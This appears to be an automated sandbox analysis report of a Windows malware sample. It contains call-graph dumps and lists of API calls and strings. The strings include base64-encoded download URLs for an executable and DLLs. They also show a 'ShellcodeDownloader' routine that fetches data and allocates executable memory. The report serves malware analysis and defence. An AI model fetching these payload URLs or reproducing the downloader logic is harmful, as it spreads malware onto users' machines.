std::_Locinfo::_Locinfo_ctor 66 API calls 19591->19592 19593 aa948e 19592->19593 19594 aa92da _Yarn 14 API calls 19593->19594 19595 aa94a6 19594->19595 19596 ab1680 std::_Locinfo::_Locinfo_ctor 66 API calls 19595->19596 19597 aa94b6 19595->19597 19596->19597 19598 aa92da _Yarn 14 API calls 19597->19598 19599 aa94ca 19598->19599 19599->19569 19601 aa9100 std::invalid_argument::invalid_argument 39 API calls 19600->19601 19602 aa91ae 19601->19602 19603 aab163 Concurrency::cancel_current_task RaiseException 19602->19603 19604 aa91bc 19603->19604 19604->19569 19606 aa1d90 std::_Locinfo::_Getctype 39 API calls 19605->19606 19607 aa22b4 19606->19607 19607->19549 19609 aa94d9 19608->19609 19610 aa1d25 19608->19610 19611 ab1680 std::_Locinfo::_Locinfo_ctor 66 API calls 19609->19611 19612 aa4f80 19610->19612 19611->19610 19613 aa65a0 14 API calls 19612->19613 19614 aa1d33 19613->19614 19614->19579 19616 aa9d12 std::_Facet_Register 3 API calls 19615->19616 19617 aa70b9 19616->19617 19618 aa1f20 44 API calls 19617->19618 19619 aa70cd 19617->19619 19618->19619 19619->19389 19621 aa5d5f 19620->19621 19622 aa5dc0 19621->19622 19624 aae6f0 19621->19624 19622->19391 19625 aae6fc 19624->19625 19629 aae711 19624->19629 19626 ab1ea8 __dosmaperr 14 API calls 19625->19626 19627 aae701 19626->19627 19628 ab12dd __wsopen_s 39 API calls 19627->19628 19630 aae70c 19628->19630 19629->19622 19630->19622 19633 aa96dc 19631->19633 19632 aa5ecc 19632->19396 19632->19399 19633->19632 19634 aa973d 19633->19634 19637 aa978b 42 API calls 19633->19637 19637->19634 20375 ab54ef 20374->20375 20376 ab5501 ___scrt_uninitialize_crt 20374->20376 20377 ab54fd 20375->20377 20379 aae2c6 20375->20379 20376->18620 20377->18620 20382 aae157 20379->20382 20385 aae04b 20382->20385 20386 aae057 CallCatchBlock 20385->20386 20393 ab13aa EnterCriticalSection 20386->20393 20388 aae0cd 20402 aae0eb 20388->20402 20390 aae061 ___scrt_uninitialize_crt 20390->20388 20394 aadfbf 20390->20394 20393->20390 20395 aadfcb CallCatchBlock 20394->20395 20405 aae736 EnterCriticalSection 20395->20405 20397 aadfd5 ___scrt_uninitialize_crt 20401 aae00e 20397->20401 20406 aae261 20397->20406 20419 aae03f 20401->20419 20451 ab13f2 LeaveCriticalSection 20402->20451 20404 aae0d9 20404->20377 20405->20397 20407 aae276 _Fputc 20406->20407 20408 aae288 20407->20408 20409 aae27d 20407->20409 20411 aae1f8 ___scrt_uninitialize_crt 64 API calls 20408->20411 20410 aae157 ___scrt_uninitialize_crt 68 API calls 20409->20410 20418 aae283 20410->20418 20412 aae292 20411->20412 20414 ab5d12 _Fgetc 39 API calls 20412->20414 20412->20418 20413 aadd8b _Fputc 39 API calls 20415 aae2c0 20413->20415 20416 aae2a9 20414->20416 20415->20401 20422 ab684e 20416->20422 20418->20413 20450 aae74a LeaveCriticalSection 20419->20450 20421 aae02d 20421->20390 20423 ab685f 20422->20423 20424 ab686c 20422->20424 20426 ab1ea8 __dosmaperr 14 API calls 20423->20426 20425 ab68b5 20424->20425 20429 ab6893 20424->20429 20428 ab1ea8 __dosmaperr 14 API calls 20425->20428 20427 ab6864 20426->20427 20427->20418 20430 ab68ba 20428->20430 20433 ab67ac 20429->20433 20432 ab12dd __wsopen_s 39 API calls 20430->20432 20432->20427 20434 ab67b8 CallCatchBlock 20433->20434 20446 abf1fa EnterCriticalSection 20434->20446 20436 ab67c7 20438 abf476 __wsopen_s 39 API calls 20436->20438 20444 ab680c 20436->20444 20437 ab1ea8 __dosmaperr 14 API calls 20441 ab6813 20437->20441 20439 ab67f3 FlushFileBuffers 20438->20439 20440 ab67ff GetLastError 20439->20440 20439->20441 20442 ab1e95 __dosmaperr 14 API calls 20440->20442 20447 ab6842 20441->20447 20442->20444 20444->20437 20446->20436 20448 abf2af __wsopen_s LeaveCriticalSection 20447->20448 20449 ab682b 20448->20449 20449->20427 20450->20421 20451->20404 20452 abad5f 20457 abab35 20452->20457 20455 abad9e 20458 abab54 20457->20458 20459 abab67 20458->20459 20461 abab7c 20458->20461 20460 ab1ea8 __dosmaperr 14 API calls 20459->20460 20462 abab6c 20460->20462 20464 abac9c 20461->20464 20477 ac3b8e 20461->20477 20463 ab12dd __wsopen_s 39 API calls 20462->20463 20466 abab77 20463->20466 20465 ab1ea8 __dosmaperr 14 API calls 20464->20465 20464->20466 20467 abad4d 20465->20467 20466->20455 20474 ac431e 20466->20474 20468 ab12dd __wsopen_s 39 API calls 20467->20468 20468->20466 20470 abacec 20470->20464 20471 ac3b8e 39 API calls 20470->20471 20472 abad0a 20471->20472 20472->20464 20473 ac3b8e 39 API calls 20472->20473 20473->20464 20509 ac3cc6 20474->20509 20478 ac3b9d 20477->20478 20479 ac3be5 20477->20479 20481 ac3ba3 20478->20481 20482 ac3bc0 20478->20482 20491 ac3bfb 20479->20491 20483 ab1ea8 __dosmaperr 14 API calls 20481->20483 20487 ab1ea8 __dosmaperr 14 API calls 20482->20487 20490 ac3bde 20482->20490 20484 ac3ba8 20483->20484 20486 ab12dd __wsopen_s 39 API calls 20484->20486 20485 ac3bb3 20485->20470 20486->20485 20488 ac3bcf 20487->20488 20489 ab12dd __wsopen_s 39 API calls 20488->20489 20489->20485 20490->20470 20492 ac3c0b 20491->20492 20493 ac3c25 20491->20493 20494 ab1ea8 __dosmaperr 14 API calls 20492->20494 20495 ac3c2d 20493->20495 20496 ac3c44 20493->20496 20499 ac3c10 20494->20499 20500 ab1ea8 __dosmaperr 14 API calls 20495->20500 20497 ac3c67 20496->20497 20498 ac3c50 20496->20498 20506 ab1ebb ctype 39 API calls 20497->20506 20508 ac3c1b 20497->20508 20501 ab1ea8 __dosmaperr 14 API calls 20498->20501 20502 ab12dd __wsopen_s 39 API calls 20499->20502 20503 ac3c32 20500->20503 20505 ac3c55 20501->20505 20502->20508 20504 ab12dd __wsopen_s 39 API calls 20503->20504 20504->20508 20507 ab12dd __wsopen_s 39 API calls 20505->20507 20506->20508 20507->20508 20508->20485 20510 ac3cd2 CallCatchBlock 20509->20510 20511 ac3cd9 20510->20511 20513 ac3d04 20510->20513 20512 ab1ea8 __dosmaperr 14 API calls 20511->20512 20514 ac3cde 20512->20514 20520 ac42b0 20513->20520 20515 ab12dd __wsopen_s 39 API calls 20514->20515 20519 ac3ce8 20515->20519 20519->20455 20533 abdb0f 20520->20533 20525 ac42e6 20527 ac3d28 20525->20527 20528 ab73d1 ___free_lconv_mon 14 API calls 20525->20528 20529 ac3d5b 20527->20529 20528->20527 20530 ac3d9f 20529->20530 20531 ac3d61 20529->20531 20530->20519 20801 abf2af LeaveCriticalSection 20531->20801 20534 ab1ebb ctype 39 API calls 20533->20534 20535 abdb21 20534->20535 20537 abdb33 20535->20537 20588 ab7d16 20535->20588 20538 ab2819 20537->20538 20594 ab26a5 20538->20594 20541 ac433e 20624 ac408c 20541->20624 20544 ac4389 20642 abf2d2 20544->20642 20545 ac4370 20547 ab1e95 __dosmaperr 14 API calls 20545->20547 20549 ac4375 20547->20549 20552 ab1ea8 __dosmaperr 14 API calls 20549->20552 20550 ac43ae 20655 ac3ff7 CreateFileW 20550->20655 20551 ac4397 20553 ab1e95 __dosmaperr 14 API calls 20551->20553 20555 ac4382 20552->20555 20556 ac439c 20553->20556 20555->20525 20557 ab1ea8 __dosmaperr 14 API calls 20556->20557 20557->20549 20558 ac4464 GetFileType 20559 ac446f GetLastError 20558->20559 20560 ac44b6 20558->20560 20564 ab1e4e __dosmaperr 14 API calls 20559->20564 20657 abf21d 20560->20657 20561 ac4439 GetLastError 20563 ab1e4e __dosmaperr 14 API calls 20561->20563 20562 ac43e7 20562->20558 20562->20561 20656 ac3ff7 CreateFileW 20562->20656 20563->20549 20566 ac447d CloseHandle 20564->20566 20566->20549 20569 ac44a6 20566->20569 20568 ac442c 20568->20558 20568->20561 20571 ab1ea8 __dosmaperr 14 API calls 20569->20571 20573 ac44ab 20571->20573 20572 ac4523 20577 ac452a 20572->20577 20687 ac3da1 20572->20687 20573->20549 20681 ab753f 20577->20681 20578 ac4566 20578->20555 20580 ac45e2 CloseHandle 20578->20580 20714 ac3ff7 CreateFileW 20580->20714 20582 ac460d 20583 ac4617 GetLastError 20582->20583 20587 ac4643 20582->20587 20584 ab1e4e __dosmaperr 14 API calls 20583->20584 20585 ac4623 20584->20585 20715 abf3e5 20585->20715 20587->20555 20591 ab7a68 20588->20591 20592 ab7c51 std::_Locinfo::_Locinfo_ctor 5 API calls 20591->20592 20593 ab7a7e 20592->20593 20593->20537 20595 ab26cd 20594->20595 20596 ab26b3 20594->20596 20598 ab26f3 20595->20598 20599 ab26d4 20595->20599 20612 ab285a 20596->20612 20600 abd837 ctype MultiByteToWideChar 20598->20600 20611 ab26bd 20599->20611 20616 ab289b 20599->20616 20602 ab2702 20600->20602 20603 ab2709 GetLastError 20602->20603 20605 ab272f 20602->20605 20608 ab289b __wsopen_s 15 API calls 20602->20608 20604 ab1e4e __dosmaperr 14 API calls 20603->20604 20607 ab2715 20604->20607 20606 abd837 ctype MultiByteToWideChar 20605->20606 20605->20611 20609 ab2746 20606->20609 20610 ab1ea8 __dosmaperr 14 API calls 20607->20610 20608->20605 20609->20603 20609->20611 20610->20611 20611->20525 20611->20541 20613 ab2865 20612->20613 20615 ab286d 20612->20615 20614 ab73d1 ___free_lconv_mon 14 API calls 20613->20614 20614->20615 20615->20611 20617 ab285a __wsopen_s 14 API calls 20616->20617 20618 ab28a9 20617->20618 20621 ab28da 20618->20621 20622 ab830e std::_Locinfo::_Locinfo_ctor 15 API calls 20621->20622 20623 ab28ba 20622->20623 20623->20611 20625 ac40ad 20624->20625 20626 ac40c7 20624->20626 20625->20626 20628 ab1ea8 __dosmaperr 14 API calls 20625->20628 20724 ac401c 20626->20724 20629 ac40bc 20628->20629 20630 ab12dd __wsopen_s 39 API calls 20629->20630 20630->20626 20631 ac40ff 20632 ac412e 20631->20632 20634 ab1ea8 __dosmaperr 14 API calls 20631->20634 20640 ac4181 20632->20640 20731 ab37f9 20632->20731 20636 ac4123 20634->20636 20635 ac417c 20637 ac41f9 20635->20637 20635->20640 20638 ab12dd __wsopen_s 39 API calls 20636->20638 20639 ab130a __Getctype 11 API calls 20637->20639 20638->20632 20641 ac4205 20639->20641 20640->20544 20640->20545 20643 abf2de CallCatchBlock 20642->20643 20738 ab13aa EnterCriticalSection 20643->20738 20645 abf2e5 20646 abf30a 20645->20646 20651 abf379 EnterCriticalSection 20645->20651 20652 abf32c 20645->20652 20742 abf0ac 20646->20742 20651->20652 20653 abf386 LeaveCriticalSection 20651->20653 20739 abf3dc 20652->20739 20653->20645 20655->20562 20656->20568 20658 abf22c 20657->20658 20659 abf295 20657->20659 20658->20659 20665 abf252 __wsopen_s 20658->20665 20660 ab1ea8 __dosmaperr 14 API calls 20659->20660 20661 abf29a 20660->20661 20662 ab1e95 __dosmaperr 14 API calls 20661->20662 20663 abf282 20662->20663 20663->20572 20666 ac4206 20663->20666 20664 abf27c SetStdHandle 20664->20663 20665->20663 20665->20664 20667 ac422e 20666->20667 20679 ac4260 20666->20679 20668 aba43d __fread_nolock 41 API calls 20667->20668 20667->20679 20669 ac423e 20668->20669 20670 ac424e 20669->20670 20671 ac4264 20669->20671 20673 ab1e95 __dosmaperr 14 API calls 20670->20673 20672 ab9eac __fread_nolock 51 API calls 20671->20672 20674 ac4276 20672->20674 20675 ac4253 20673->20675 20676 ac428c 20674->20676 20751 ac608e 20674->20751 20678 ab1ea8 __dosmaperr 14 API calls 20675->20678 20675->20679 20676->20675 20677 aba43d __fread_nolock 41 API calls 20676->20677 20677->20675 20678->20679 20679->20572 20682 ab7552 _Fputc 20681->20682 20782 ab756f 20682->20782 20684 ab755e 20685 aadd8b _Fputc 39 API calls 20684->20685 20686 ab756a 20685->20686 20686->20555 20688 ac3ebc 20687->20688 20689 ac3dd2 20687->20689 20688->20577 20688->20578 20690 ab37f9 __wsopen_s 39 API calls 20689->20690 20697 ac3df2 20689->20697 20691 ac3de9 20690->20691 20692 ac3fec 20691->20692 20691->20697 20693 ab130a __Getctype 11 API calls 20692->20693 20694 ac3ff6 20693->20694 20695 ac3ee2 20695->20688 20696 ab9eac __fread_nolock 51 API calls 20695->20696 20701 ac3eec 20695->20701 20708 ac3f12 20696->20708 20697->20688 20697->20695 20698 ac3eb3 20697->20698 20699 aba43d __fread_nolock 41 API calls 20697->20699 20698->20688 20698->20701 20795 ab706d 20698->20795 20702 ac3ecc 20699->20702 20701->20688 20706 ab1ea8 __dosmaperr 14 API calls 20701->20706 20702->20698 20705 ac3ed7 20702->20705 20703 ac3f4a 20709 ab1ea8 __dosmaperr 14 API calls 20703->20709 20704 ac3f57 20707 ac3f7d 20704->20707 20711 ac3f5f 20704->20711 20710 aba43d __fread_nolock 41 API calls 20705->20710 20706->20688 20712 aba43d __fread_nolock 41 API calls 20707->20712 20708->20688 20708->20701 20708->20703 20708->20704 20708->20707 20709->20701 20710->20695 20713 aba43d __fread_nolock 41 API calls 20711->20713 20712->20701 20713->20701 20714->20582 20716 abf45b 20715->20716 20717 abf3f4 20715->20717 20718 ab1ea8 __dosmaperr 14 API calls 20716->20718 20717->20716 20723 abf41e __wsopen_s 20717->20723 20719 abf460 20718->20719 20720 ab1e95 __dosmaperr 14 API calls 20719->20720 20721 abf44b 20720->20721 20721->20587 20722 abf445 SetStdHandle 20722->20721 20723->20721 20723->20722 20726 ac4034 20724->20726 20725 ac404f 20725->20631 20726->20725 20727 ab1ea8 __dosmaperr 14 API calls 20726->20727 20728 ac4073 20727->20728 20729 ab12dd __wsopen_s 39 API calls 20728->20729 20730 ac407e 20729->20730 20730->20631 20732 ab381a 20731->20732 20733 ab3805 20731->20733 20732->20635 20734 ab1ea8 __dosmaperr 14 API calls 20733->20734 20735 ab380a 20734->20735 20736 ab12dd __wsopen_s 39 API calls 20735->20736 20737 ab3815 20736->20737 20737->20635 20738->20645 20750 ab13f2 LeaveCriticalSection 20739->20750 20741 abf34c 20741->20550 20741->20551 20743 ab794f __dosmaperr 14 API calls 20742->20743 20745 abf0be 20743->20745 20744 abf0cb 20746 ab73d1 ___free_lconv_mon 14 API calls 20744->20746 20745->20744 20747 ab7f60 __wsopen_s 6 API calls 20745->20747 20748 abf120 20746->20748 20747->20745 20748->20652 20749 abf1fa EnterCriticalSection 20748->20749 20749->20652 20750->20741 20752 ac60a1 _Fputc 20751->20752 20757 ac60c5 20752->20757 20755 aadd8b _Fputc 39 API calls 20756 ac60c0 20755->20756 20756->20676 20777 ac6041 20757->20777 20759 ac61df 20763 aba43d __fread_nolock 41 API calls 20759->20763 20771 ac61a8 20759->20771 20761 ac6121 20764 ab794f __dosmaperr 14 API calls 20761->20764 20762 aba43d __fread_nolock 41 API calls 20765 ac60b3 20762->20765 20766 ac61f7 20763->20766 20773 ac612d __wsopen_s 20764->20773 20765->20755 20767 abf476 __wsopen_s 39 API calls 20766->20767 20766->20771 20768 ac620f SetEndOfFile 20767->20768 20769 ac621b GetLastError 20768->20769 20768->20771 20769->20771 20770 ab73d1 ___free_lconv_mon 14 API calls 20770->20771 20771->20762 20772 ab71b5 __wsopen_s 62 API calls 20772->20773 20773->20772 20774 ac6135 20773->20774 20775 ac6199 __wsopen_s 20773->20775 20774->20770 20776 ab73d1 ___free_lconv_mon 14 API calls 20775->20776 20776->20771 20778 aba43d __fread_nolock 41 API calls 20777->20778 20779 ac605a 20778->20779 20780 aba43d __fread_nolock 41 API calls 20779->20780 20781 ac6069 20780->20781 20781->20759 20781->20761 20781->20771 20783 abf476 __wsopen_s 39 API calls 20782->20783 20786 ab757f 20783->20786 20784 ab7585 20785 abf3e5 __wsopen_s 15 API calls 20784->20785 20794 ab75dd __wsopen_s 20785->20794 20786->20784 20787 ab75b7 20786->20787 20788 abf476 __wsopen_s 39 API calls 20786->20788 20787->20784 20789 abf476 __wsopen_s 39 API calls 20787->20789 20790 ab75ae 20788->20790 20791 ab75c3 CloseHandle 20789->20791 20793 abf476 __wsopen_s 39 API calls 20790->20793 20791->20784 20792 ab75cf GetLastError 20791->20792 20792->20784 20793->20787 20794->20684 20796 ab7080 _Fputc 20795->20796 20797 ab70a4 __wsopen_s 64 API calls 20796->20797 20798 ab7092 20797->20798 20799 aadd8b _Fputc 39 API calls 20798->20799 20800 ab709f 20799->20800 20800->20698 20801->20530

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00AA2EE5
                                                                      • CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Mysoftwaref,00000000), ref: 00AA2F05
                                                                        • Part of subcall function 00AA2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00AA2CDB
                                                                        • Part of subcall function 00AA2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00AA2D19
                                                                        • Part of subcall function 00AA2CB0: task.LIBCPMTD ref: 00AA2D25
                                                                        • Part of subcall function 00AA2CB0: InternetReadFile.WININET(00000000,00000001,00000400,00000000), ref: 00AA2D87
                                                                        • Part of subcall function 00AA2CB0: InternetCloseHandle.WININET(00000000), ref: 00AA2DC1
                                                                        • Part of subcall function 00AA2CB0: InternetCloseHandle.WININET(00000000), ref: 00AA2DDD
                                                                      • task.LIBCPMTD ref: 00AA2F47
                                                                      • task.LIBCPMTD ref: 00AA2F56
                                                                      • task.LIBCPMTD ref: 00AA2F97
                                                                      • task.LIBCPMTD ref: 00AA2FA6
                                                                      • task.LIBCPMTD ref: 00AA2FF6
                                                                      • task.LIBCPMTD ref: 00AA3008
                                                                      • task.LIBCPMTD ref: 00AA3058
                                                                      • task.LIBCPMTD ref: 00AA306A
                                                                      • task.LIBCPMTD ref: 00AA30BA
                                                                      • task.LIBCPMTD ref: 00AA30CC
                                                                      • task.LIBCPMTD ref: 00AA311C
                                                                      • task.LIBCPMTD ref: 00AA312E
                                                                      • task.LIBCPMTD ref: 00AA317E
                                                                      • task.LIBCPMTD ref: 00AA3190
                                                                      Strings
                                                                      • C:\Program Files (x86)\Mysoftwaref\libcurl.dll, xrefs: 00AA3133
                                                                      • C:\Program Files (x86)\Mysoftwaref\msvcp120.dll, xrefs: 00AA2F5B
                                                                      • C:\Program Files (x86)\Mysoftwaref\msvcr120.dll, xrefs: 00AA2FAB
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=, xrefs: 00AA2F6F
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9RVDIuZXhl, xrefs: 00AA2F1F
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=, xrefs: 00AA2FC2
                                                                      • aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL2xpYmN1cmwuZGxs, xrefs: 00AA314A
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=, xrefs: 00AA3086
                                                                      • C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll, xrefs: 00AA300D
                                                                      • C:\Program Files (x86)\Mysoftwaref\msvcp140.dll, xrefs: 00AA306F
                                                                      • C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll, xrefs: 00AA30D1
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9jeGltYWdlY3J0LmRsbA==, xrefs: 00AA30E8
                                                                      • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs, xrefs: 00AA3024
                                                                      • C:\Program Files (x86)\Mysoftwaref\software.exe, xrefs: 00AA2F0B
                                                                      • C:\Program Files (x86)\Mysoftwaref, xrefs: 00AA2F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileInfoReadSystem
                                                                      • String ID: C:\Program Files (x86)\Mysoftwaref$C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll$C:\Program Files (x86)\Mysoftwaref\libcurl.dll$C:\Program Files (x86)\Mysoftwaref\msvcp120.dll$C:\Program Files (x86)\Mysoftwaref\msvcp140.dll$C:\Program Files (x86)\Mysoftwaref\msvcr120.dll$C:\Program Files (x86)\Mysoftwaref\software.exe$C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll$aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL2xpYmN1cmwuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9RVDIuZXhl$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9jeGltYWdlY3J0LmRsbA==$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=
                                                                      • API String ID: 1611864481-1430992863
                                                                      • Opcode ID: c8302574628e2c95955c8323557226e4ac8a312efc0d7545a84a0be78458683d
                                                                      • Instruction ID: 6bf3c8d969d3b27f966f74db4c771e65a346050633d356e4ae328f656d96f1a3
                                                                      • Opcode Fuzzy Hash: c8302574628e2c95955c8323557226e4ac8a312efc0d7545a84a0be78458683d
                                                                      • Instruction Fuzzy Hash: D6713A72C00658EACB14EBA0CE46BDDB774BF12310F9086D9A01A672D1EB741B8DDF55

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00AA2EC0: GetSystemInfo.KERNELBASE(?), ref: 00AA2EE5
                                                                        • Part of subcall function 00AA2EC0: CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Mysoftwaref,00000000), ref: 00AA2F05
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F47
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F56
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2F97
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2FA6
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA2FF6
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA3008
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA3058
                                                                        • Part of subcall function 00AA2EC0: task.LIBCPMTD ref: 00AA306A
                                                                      • Sleep.KERNELBASE(00000BB8,?,00AC72E3,000000FF), ref: 00AA31DC
                                                                      • InternetOpenA.WININET(ShellcodeDownloader,00000001,00000000,00000000,00000000), ref: 00AA31FD
                                                                      • InternetOpenUrlA.WININET(00000000,00AD3904,00000000,00000000,80000000,00000000), ref: 00AA323D
                                                                      • InternetCloseHandle.WININET(?), ref: 00AA326E
                                                                      • InternetCloseHandle.WININET(?), ref: 00AA32D1
                                                                      • InternetCloseHandle.WININET(?), ref: 00AA32DB
                                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00AA32FC
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00AA3336
                                                                      • fpos.LIBCPMTD ref: 00AA33C8
                                                                      • fpos.LIBCPMTD ref: 00AA33DD
                                                                      • fpos.LIBCPMTD ref: 00AA340D
                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00AD387C,00000024,00000040), ref: 00AA3415
                                                                      • fpos.LIBCPMTD ref: 00AA3445
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA3474
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00AA3340
                                                                        • Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA797D
                                                                        • Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA7AD7
                                                                        • Part of subcall function 00AA7950: char_traits.LIBCPMTD ref: 00AA7BBC
                                                                        • Part of subcall function 00AA38B0: fpos.LIBCPMTD ref: 00AA395A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeInfoReadSleepSystem
                                                                      • String ID: ShellcodeDownloader$error$error$error$error$error
                                                                      • API String ID: 161186730-945787770
                                                                      • Opcode ID: 51ba48fd3eaa70197ef28a39b3bdd556d31e12a00b9fae5a07bceb9d98e23382
                                                                      • Instruction ID: b8475ab97aea51fcfd2b3822e9716484527ccc640cea76df4b2205b81a3ec26d
                                                                      • Opcode Fuzzy Hash: 51ba48fd3eaa70197ef28a39b3bdd556d31e12a00b9fae5a07bceb9d98e23382
                                                                      • Instruction Fuzzy Hash: 9A816A71A40208BBDB14EBA4DD56FEEB774BB5AB00F104519F102772C1DFB86A49CBA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 163 ac433e-ac436e call ac408c 166 ac4389-ac4395 call abf2d2 163->166 167 ac4370-ac437b call ab1e95 163->167 173 ac43ae-ac43f7 call ac3ff7 166->173 174 ac4397-ac43ac call ab1e95 call ab1ea8 166->174 172 ac437d-ac4384 call ab1ea8 167->172 181 ac4663-ac4667 172->181 183 ac43f9-ac4402 173->183 184 ac4464-ac446d GetFileType 173->184 174->172 188 ac4439-ac445f GetLastError call ab1e4e 183->188 189 ac4404-ac4408 183->189 185 ac446f-ac44a0 GetLastError call ab1e4e CloseHandle 184->185 186 ac44b6-ac44b9 184->186 185->172 202 ac44a6-ac44b1 call ab1ea8 185->202 193 ac44bb-ac44c0 186->193 194 ac44c2-ac44c8 186->194 188->172 189->188 190 ac440a-ac4437 call ac3ff7 189->190 190->184 190->188 195 ac44cc-ac451a call abf21d 193->195 194->195 196 ac44ca 194->196 205 ac451c-ac4528 call ac4206 195->205 206 ac4539-ac4561 call ac3da1 195->206 196->195 202->172 205->206 212 ac452a 205->212 213 ac4566-ac45a7 206->213 214 ac4563-ac4564 206->214 217 ac452c-ac4534 call ab753f 212->217 215 ac45c8-ac45d6 213->215 216 ac45a9-ac45ad 213->216 214->217 219 ac45dc-ac45e0 215->219 220 ac4661 215->220 216->215 218 ac45af-ac45c3 216->218 217->181 218->215 219->220 222 ac45e2-ac4615 CloseHandle call ac3ff7 219->222 220->181 226 ac4649-ac465d 222->226 227 ac4617-ac4643 GetLastError call ab1e4e call abf3e5 222->227 226->220 227->226
                                                                      APIs
                                                                        • Part of subcall function 00AC3FF7: CreateFileW.KERNELBASE(?,00000000,?,00AC43E7,?,?,00000000,?,00AC43E7,?,0000000C), ref: 00AC4014
                                                                      • GetLastError.KERNEL32 ref: 00AC4452
